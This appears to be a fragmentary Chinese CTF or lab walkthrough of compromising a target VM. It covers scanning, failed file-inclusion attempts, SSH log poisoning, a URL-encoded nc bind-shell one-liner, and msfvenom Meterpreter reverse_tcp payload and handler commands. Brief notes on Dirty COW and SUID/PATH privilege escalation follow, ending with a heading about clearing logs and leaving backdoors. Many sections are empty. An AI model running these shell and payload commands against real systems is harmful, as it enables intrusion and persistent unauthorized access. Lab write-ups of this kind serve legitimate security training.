目录
主机发现
端口扫描
SSH尝试连接
Web渗透
漏洞挖掘
GetShell
法一
法二(MSF)
提权
法一(失败了)
法二(脏牛,也失败了。。)
法三
法四
法五
flag
清痕迹,留后门
主机发现 端口扫描
SSH尝试连接
Web渗透 漏洞挖掘
试试其他的路径 : /var/log/apache2/access.log /var/log/apache/access.log -----WEB 日志文件 /var/www/log/access.log 全失败 尝试读取以下配置文件 : /etc/apache2/apache2.conf 失败 尝试伪协议读取: file=php://filter/convert.base64-encode/resource=index.php 失败 PHP伪协议读取试试也是失败的
由于开了22,80,web日志不行,看一下 SSH 日志
GetShell 法一
依次执行 mkfifo /tmp/t 编码:mkfifo+/tmp/t cat /tmp/t | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/t 编码:cat+/tmp/t+|+/bin/sh+-i+2>%261+|+nc%20-l+1234+>+/tmp/t;
法二(MSF)
生成木马脚本: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机上的端口 -f elf > GetShell.elf
use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set lhost 攻击机IP set lport 攻击机端口号 run
提权 法一(失败了)
在靶机上下载后 解析的时候都失败了 -> 啥也不是
法二(脏牛,也失败了。。)法三
这个文件 而这个文件是具有s权限的 !!有的S标志位文件可写,有的不可写但是可以执行通过管道符一并执行我们的马,有的不可写但是可以调用,通过伪造同样文件名来执行eg:$PATH
法四
法五
flag
清痕迹,留后门
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)